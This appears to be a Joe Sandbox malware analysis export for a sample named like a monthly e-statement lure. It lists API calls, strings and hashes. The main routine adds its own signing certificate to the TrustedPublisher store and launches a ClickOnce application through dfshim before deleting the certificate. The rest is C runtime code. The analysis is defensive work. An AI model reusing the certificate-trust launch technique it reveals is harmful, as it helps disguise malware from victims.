5813 9a3d86 5814 9a1f7d ___scrt_uninitialize_crt 7 API calls 5813->5814 5815 9a3d8d 5814->5815 6795 9a9146 IsProcessorFeaturePresent 6005 9a98c5 6007 9a98ed 6005->6007 6006 9a9925 6007->6006 6008 9a991e 6007->6008 6009 9a9917 6007->6009 6018 9a9980 6008->6018 6014 9a9997 6009->6014 6015 9a99a0 6014->6015 6022 9aa06f 6015->6022 6017 9a991c 6019 9a99a0 6018->6019 6020 9aa06f __startOneArgErrorHandling 16 API calls 6019->6020 6021 9a9923 6020->6021 6023 9aa0ae __startOneArgErrorHandling 6022->6023 6025 9aa130 __startOneArgErrorHandling 6023->6025 6028 9aa472 6023->6028 6027 9aa166 _ValidateLocalCookies 6025->6027 6031 9aa786 6025->6031 6027->6017 6038 9aa495 6028->6038 6032 9aa7a8 6031->6032 6033 9aa793 6031->6033 6035 9a47f9 _free 15 API calls 6032->6035 6034 9aa7ad 6033->6034 6036 9a47f9 _free 15 API calls 6033->6036 6034->6027 6035->6034 6037 9aa7a0 6036->6037 6037->6027 6039 9aa4c0 __raise_exc 6038->6039 6040 9aa6b9 RaiseException 6039->6040 6041 9aa490 6040->6041 6041->6025 5816 9a48bb 5817 9a48cb 5816->5817 5825 9a48e1 5816->5825 5818 9a47f9 _free 15 API calls 5817->5818 5819 9a48d0 5818->5819 5820 9a473d _abort 21 API calls 5819->5820 5822 9a48da 5820->5822 5823 9a49b9 5828 9a4869 _free 15 API calls 5823->5828 5826 9a494b 5825->5826 5829 9a4a2c 5825->5829 5835 9a4a4b 5825->5835 5846 9a31ec 5826->5846 5827 9a49b0 5827->5823 5832 9a4a3e 5827->5832 5852 9a79bb 5827->5852 5828->5829 5861 9a4c65 5829->5861 5833 9a474d _abort 6 API calls 5832->5833 5834 9a4a4a 5833->5834 5836 9a4a57 5835->5836 5836->5836 5837 9a480c _free 15 API calls 5836->5837 5838 9a4a85 5837->5838 5839 9a79bb 21 API calls 5838->5839 5840 9a4ab1 5839->5840 5841 9a474d _abort 6 API calls 5840->5841 5842 9a4ae0 _abort 5841->5842 5843 9a4b81 FindFirstFileExA 5842->5843 5844 9a4bd0 5843->5844 5845 9a4a4b 21 API calls 5844->5845 5847 9a3201 5846->5847 5848 9a31fd 5846->5848 5847->5848 5849 9a480c _free 15 API calls 5847->5849 5848->5827 5850 9a322f 5849->5850 5851 9a4869 _free 15 API calls 5850->5851 5851->5848 5854 9a790a 5852->5854 5853 9a791f 5855 9a47f9 _free 15 API calls 5853->5855 5856 9a7924 5853->5856 5854->5853 5854->5856 5859 9a795b 5854->5859 5857 9a794a 5855->5857 5856->5827 5858 9a473d _abort 21 API calls 5857->5858 5858->5856 5859->5856 5860 9a47f9 _free 15 API calls 5859->5860 5860->5857 5862 9a4c6f 5861->5862 5863 9a4c7f 5862->5863 5864 9a4869 _free 15 API calls 5862->5864 5865 9a4869 _free 15 API calls 5863->5865 5864->5862 5866 9a4c86 5865->5866 5866->5822 5867 9a14bb IsProcessorFeaturePresent 5868 9a14d0 5867->5868 5871 9a1493 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5868->5871 5870 9a15b3 5871->5870 6042 9a12fb 6047 9a1aac SetUnhandledExceptionFilter 6042->6047 6044 9a1300 6048 9a38f9 6044->6048 6046 9a130b 6047->6044 6049 9a391f 6048->6049 6050 9a3905 6048->6050 6049->6046 6050->6049 6051 9a47f9 _free 15 API calls 6050->6051 6052 9a390f 6051->6052 6053 9a473d _abort 21 API calls 6052->6053 6054 9a391a 6053->6054 6054->6046 5872 9a1ab8 5873 9a1aef 5872->5873 5874 9a1aca 5872->5874 5874->5873 5881 9a209a 5874->5881 5893 9a23c3 5881->5893 5884 9a20a3 5885 9a23c3 43 API calls 5884->5885 5886 9a1b06 5885->5886 5887 9a3e89 5886->5887 5888 9a3e95 _abort 5887->5888 5889 9a4424 _abort 33 API calls 5888->5889 5890 9a3e9a 5889->5890 5891 9a3f24 _abort 33 API calls 5890->5891 5892 9a3ec4 5891->5892 5907 9a23d1 5893->5907 5895 9a23c8 5896 9a1afc 5895->5896 5897 9a6b14 _abort 2 API calls 5895->5897 5896->5884 5898 9a3f29 5897->5898 5899 9a3f35 5898->5899 5902 9a6b6f _abort 33 API calls 5898->5902 5900 9a3f3e IsProcessorFeaturePresent 5899->5900 5901 9a3f5c 5899->5901 5903 9a3f49 5900->5903 5904 9a3793 _abort 23 API calls 5901->5904 5902->5899 5905 9a4573 _abort 3 API calls 5903->5905 5906 9a3f66 5904->5906 5905->5901 5908 9a23da 5907->5908 5909 9a23dd GetLastError 5907->5909 5908->5895 5919 9a26a4 5909->5919 5912 9a2411 5913 9a2457 SetLastError 5912->5913 5913->5895 5914 9a26df ___vcrt_FlsSetValue 6 API calls 5915 9a240b 5914->5915 5915->5912 5916 9a2433 5915->5916 5917 9a26df ___vcrt_FlsSetValue 6 API calls 5915->5917 5916->5912 5918 9a26df ___vcrt_FlsSetValue 6 API calls 5916->5918 5917->5916 5918->5912 5920 9a2543 ___vcrt_FlsGetValue 5 API calls 5919->5920 5921 9a26be 5920->5921 5922 9a26d6 TlsGetValue 5921->5922 5923 9a23f2 5921->5923 5922->5923 5923->5912 5923->5913 5923->5914 6539 9a383f 6540 9a384b ___scrt_is_nonwritable_in_current_image 6539->6540 6541 9a3882 _abort 6540->6541 6547 9a56e2 EnterCriticalSection 6540->6547 6543 9a385f 6544 9a67cb __fassign 15 API calls 6543->6544 6545 9a386f 6544->6545 6548 9a3888 6545->6548 6547->6543 6551 9a572a LeaveCriticalSection 6548->6551 6550 9a388f 6550->6541 6551->6550 6796 9a7570 6797 9a75a9 6796->6797 6798 9a47f9 _free 15 API calls 6797->6798 6802 9a75d5 _ValidateLocalCookies 6797->6802 6799 9a75b2 6798->6799 6800 9a473d _abort 21 API calls 6799->6800 6801 9a75bd _ValidateLocalCookies 6800->6801 6055 9a8df1 6056 9a8e15 6055->6056 6057 9a8e2e 6056->6057 6059 9a9beb __startOneArgErrorHandling 6056->6059 6060 9a8e78 6057->6060 6063 9a99d3 6057->6063 6062 9a9c2d __startOneArgErrorHandling 6059->6062 6071 9aa1c4 6059->6071 6064 9a99f0 DecodePointer 6063->6064 6066 9a9a00 6063->6066 6064->6066 6065 9a9a82 _ValidateLocalCookies 6065->6060 6066->6065 6067 9a9a8d 6066->6067 6068 9a9a37 6066->6068 6067->6065 6069 9a47f9 _free 15 API calls 6067->6069 6068->6065 6070 9a47f9 _free 15 API calls 6068->6070 6069->6065 6070->6065 6072 9aa1fd __startOneArgErrorHandling 6071->6072 6073 9aa495 __raise_exc RaiseException 6072->6073 6074 9aa224 __startOneArgErrorHandling 6072->6074 6073->6074 6075 9aa267 6074->6075 6076 9aa242 6074->6076 6077 9aa786 __startOneArgErrorHandling 15 API calls 6075->6077 6080 9aa7b5 6076->6080 6079 9aa262 __startOneArgErrorHandling _ValidateLocalCookies 6077->6079 6079->6062 6081 9aa7c4 6080->6081 6082 9aa838 __startOneArgErrorHandling 6081->6082 6083 9aa7e3 __startOneArgErrorHandling 6081->6083 6084 9aa786 __startOneArgErrorHandling 15 API calls 6082->6084 6085 9aa786 __startOneArgErrorHandling 15 API calls 6083->6085 6086 9aa831 6083->6086 6084->6086 6085->6086 6086->6079 6087 9a1ff4 6090 9a2042 6087->6090 6091 9a1fff 6090->6091 6092 9a204b 6090->6092 6092->6091 6093 9a23c3 43 API calls 6092->6093 6094 9a2086 6093->6094 6095 9a23c3 43 API calls 6094->6095 6096 9a2091 6095->6096 6097 9a3e89 33 API calls 6096->6097 6098 9a2099 6097->6098 5924 9a3eb5 5925 9a3eb8 5924->5925 5926 9a3f24 _abort 33 API calls 5925->5926 5927 9a3ec4 5926->5927 6099 9a9beb 6100 9a9c04 __startOneArgErrorHandling 6099->6100 6101 9aa1c4 16 API calls 6100->6101 6102 9a9c2d __startOneArgErrorHandling 6100->6102 6101->6102 6552 9a142e 6555 9a2cf0 6552->6555 6554 9a143f 6556 9a44a8 _free 15 API calls 6555->6556 6557 9a2d07 _ValidateLocalCookies 6556->6557 6557->6554 6558 9a452d 6566 9a5858 6558->6566 6560 9a4537 6561 9a4541 6560->6561 6562 9a44a8 _free 15 API calls 6560->6562 6563 9a4549 6562->6563 6564 9a4556 6563->6564 6571 9a4559 6563->6571 6567 9a5741 _free 5 API calls 6566->6567 6568 9a587f 6567->6568 6569 9a5897 TlsAlloc 6568->6569 6570 9a5888 _ValidateLocalCookies 6568->6570 6569->6570 6570->6560 6572 9a4563 6571->6572 6573 9a4569 6571->6573 6575 9a58ae 6572->6575 6573->6561 6576 9a5741 _free 5 API calls 6575->6576 6577 9a58d5 6576->6577 6578 9a58ed TlsFree 6577->6578 6579 9a58e1 _ValidateLocalCookies 6577->6579 6578->6579 6579->6573 6803 9a9160 6806 9a917e 6803->6806 6805 9a9176 6807 9a9183 6806->6807 6808 9a99d3 16 API calls 6807->6808 6809 9a9218 6807->6809 6810 9a93af 6808->6810 6809->6805 6810->6805 5928 9a56a1 5929 9a56ac 5928->5929 5931 9a56d5 5929->5931 5932 9a56d1 5929->5932 5934 9a59b3 5929->5934 5939 9a56f9 5931->5939 5935 9a5741 _free 5 API calls 5934->5935 5936 9a59da 5935->5936 5937 9a59f8 InitializeCriticalSectionAndSpinCount 5936->5937 5938 9a59e3 _ValidateLocalCookies 5936->5938 5937->5938 5938->5929 5940 9a5725 5939->5940 5941 9a5706 5939->5941 5940->5932 5942 9a5710 DeleteCriticalSection 5941->5942 5942->5940 5942->5942 6103 9a8ce1 6104 9a8d01 6103->6104 6107 9a8d38 6104->6107 6106 9a8d2b 6109 9a8d3f 6107->6109 6108 9a8da0 6110 9a9997 16 API calls 6108->6110 6111 9a988e 6108->6111 6109->6108 6113 9a8d5f 6109->6113 6112 9a8dee 6110->6112 6111->6106 6112->6106 6113->6111 6114 9a9997 16 API calls 6113->6114 6115 9a98be 6114->6115 6115->6106 5943 9a5ba6 5944 9a5bb1 5943->5944 5946 9a5bd7 5943->5946 5945 9a5bc1 FreeLibrary 5944->5945 5944->5946 5945->5944 6580 9a6026 6581 9a602b 6580->6581 6582 9a604e 6581->6582 6584 9a5c56 6581->6584 6585 9a5c85 6584->6585 6586 9a5c63 6584->6586 6585->6581 6587 9a5c7f 6586->6587 6588 9a5c71 DeleteCriticalSection 6586->6588 6589 9a4869 _free 15 API calls 6587->6589 6588->6587 6588->6588 6589->6585 6116 9a33e5 6117 9a33fd 6116->6117 6118 9a33f7 6116->6118 6120 9a3376 6118->6120 6121 9a33a0 6120->6121 6122 9a3383 6120->6122 6121->6117 6123 9a339a 6122->6123 6124 9a4869 _free 15 API calls 6122->6124 6125 9a4869 _free 15 API calls 6123->6125 6124->6122 6125->6121

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000,00000104), ref: 009A1016
                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 009A1025
                                                                                                                                                                                                                                                    • CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 009A1032
                                                                                                                                                                                                                                                    • LocalAlloc.KERNELBASE(00000000,00040000), ref: 009A1057
                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000,00040000), ref: 009A1063
                                                                                                                                                                                                                                                    • CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 009A1082
                                                                                                                                                                                                                                                    • CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 009A10B2
                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000,?), ref: 009A10C5
                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000000,00002000), ref: 009A10F4
                                                                                                                                                                                                                                                    • CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 009A110A
                                                                                                                                                                                                                                                    • CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 009A111A
                                                                                                                                                                                                                                                    • CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 009A112D
                                                                                                                                                                                                                                                    • CertFreeCertificateContext.CRYPT32(00000000), ref: 009A1134
                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 009A113E
                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 009A115D
                                                                                                                                                                                                                                                    • CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 009A116E
                                                                                                                                                                                                                                                    • CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 009A1182
                                                                                                                                                                                                                                                    • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 009A1198
                                                                                                                                                                                                                                                    • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 009A11A9
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(dfshim), ref: 009A11BA
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 009A11C6
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00009C40), ref: 009A11E8
                                                                                                                                                                                                                                                    • CertDeleteCertificateFromStore.CRYPT32(?), ref: 009A120B
                                                                                                                                                                                                                                                    • CertCloseStore.CRYPT32(?,00000000), ref: 009A121A
                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 009A1223
                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 009A1228
                                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 009A122D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
                                                                                                                                                                                                                                                    • String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
                                                                                                                                                                                                                                                    • API String ID: 335784236-860318880
                                                                                                                                                                                                                                                    • Opcode ID: de6a27f127b36e8f6a689e39efa9c684e3a5ab55a2bd0d08c27304c94c7a78cc
                                                                                                                                                                                                                                                    • Instruction ID: 4be58e80b965cb0c1b48d492ff302a3de331fdae0322a881d0f5cc0ceab26856
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de6a27f127b36e8f6a689e39efa9c684e3a5ab55a2bd0d08c27304c94c7a78cc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75618C71A54228AFEB219B90DC49FAFBBB8EF4AB50F110014FA14B7291C7719901DBE4
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 009A466B
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 009A4675
                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 009A4682
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                    • String ID: kz]G
                                                                                                                                                                                                                                                    • API String ID: 3906539128-1940436402
                                                                                                                                                                                                                                                    • Opcode ID: b7761ee4ac3aec242c630eaf93f6602c06d88cdbdabc72fd253b241126aefe35
                                                                                                                                                                                                                                                    • Instruction ID: 005e373a4e3f1c229e44ec2fe1e1aaf9c215d41be3e01fcae0ba7481674550da
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7761ee4ac3aec242c630eaf93f6602c06d88cdbdabc72fd253b241126aefe35
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C31D67491122C9BCB21DF64DD8879DBBB8BF49310F5041DAE41CA7261E7709F858F85
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 009A192B
                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 009A19F7
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009A1A10
                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 009A1A1A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                                                                                                                    • Opcode ID: 0db09eb4297cbc77bd692f9a563afad21cf43259592abcdedd9a1d278d5542cf
                                                                                                                                                                                                                                                    • Instruction ID: 06fce974de17d7221f5be0bf77e1c426690c15c63955b06d188257224534956f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0db09eb4297cbc77bd692f9a563afad21cf43259592abcdedd9a1d278d5542cf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5312875D052289BDF20DFA4D9497CDBBB8AF09300F1041AAE40CAB254EB709A84CF85
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: .$kz]G
                                                                                                                                                                                                                                                    • API String ID: 0-3939051151
                                                                                                                                                                                                                                                    • Opcode ID: 755807c51d76ff2239521368b5c3878f2b360dbc7f6c6359167cfea85f03f96c
                                                                                                                                                                                                                                                    • Instruction ID: a736c26d3f78c787846529288bf6624265037eec027ccf791048cc65c991ca50
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 755807c51d76ff2239521368b5c3878f2b360dbc7f6c6359167cfea85f03f96c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E31D072900249ABCB249E78CC85FEE7BBDEBC6314F1441A8E51997251E6B09D448BA0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,009A364D,?,009B02E0,0000000C,009A37A4,?,00000002,00000000,?,009A3F66,00000003,009A209F,009A1AFC), ref: 009A3698
                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,009A364D,?,009B02E0,0000000C,009A37A4,?,00000002,00000000,?,009A3F66,00000003,009A209F,009A1AFC), ref: 009A369F
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 009A36B1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                                    • Opcode ID: c20ed2cde65e3bd143c915072d79c916d23284e4f95ef07d3d641eb5bec41e37
                                                                                                                                                                                                                                                    • Instruction ID: 6c451d8aa7985fbf570d9d2f49e76e523b802f9d70dbe27a7058038bf9fa2a41
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c20ed2cde65e3bd143c915072d79c916d23284e4f95ef07d3d641eb5bec41e37
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53E04671024108AFCF11AF54CD0AB5A3B29FF82341B008014FA058A232DB35DE42DAD0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,009AA490,?,?,00000008,?,?,009AA130,00000000), ref: 009AA6C2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                                                                                                                                    • Opcode ID: fd83222292119b67a171a0d66f87a27c13b266168e1e94e19e1e5e56ce738306
                                                                                                                                                                                                                                                    • Instruction ID: 7ceb81b99e7a8416d7c8924af04dd5166457f13b30d289777743a85ade25f070
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd83222292119b67a171a0d66f87a27c13b266168e1e94e19e1e5e56ce738306
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EB13E31510608DFD715CF28C48AB697BE0FF46364F298658E89ACF2A1C339D991CF81
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 009A1BEA
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2325560087-0
                                                                                                                                                                                                                                                    • Opcode ID: deb025b74409410fa5a843638437d8b93d893843f1f28ec20e9871d0ff3684f7
                                                                                                                                                                                                                                                    • Instruction ID: c7809a95a35f86e25fc3cdff01c9577e3a17c5e8e3f38ba79b8ecaef05d5a6c8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: deb025b74409410fa5a843638437d8b93d893843f1f28ec20e9871d0ff3684f7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B51AEB1E242158FEB18CF65D9917AEBBF8FB49320F14812AC401EB394D3749940CF90
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,009A1300), ref: 009A1AB1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2258333372.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258313163.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258351459.00000000009AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258370362.00000000009B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2258389168.00000000009B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9a0000_monthly-eStatementForum120478962.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                                                                    • Opcode ID: 534273db4cb9ddfc80f6b0108d7eba292ae9aeb2bdb50cefd2ddb685565a0f7a
                                                                                                                                                                                                                                                    • Instruction ID: bb03f6db80ca37c75cdd02c30710ef7825d2bfefd6d27f2171b26754eb40b12f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 534273db4cb9ddfc80f6b0108d7eba292ae9aeb2bdb50cefd2ddb685565a0f7a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
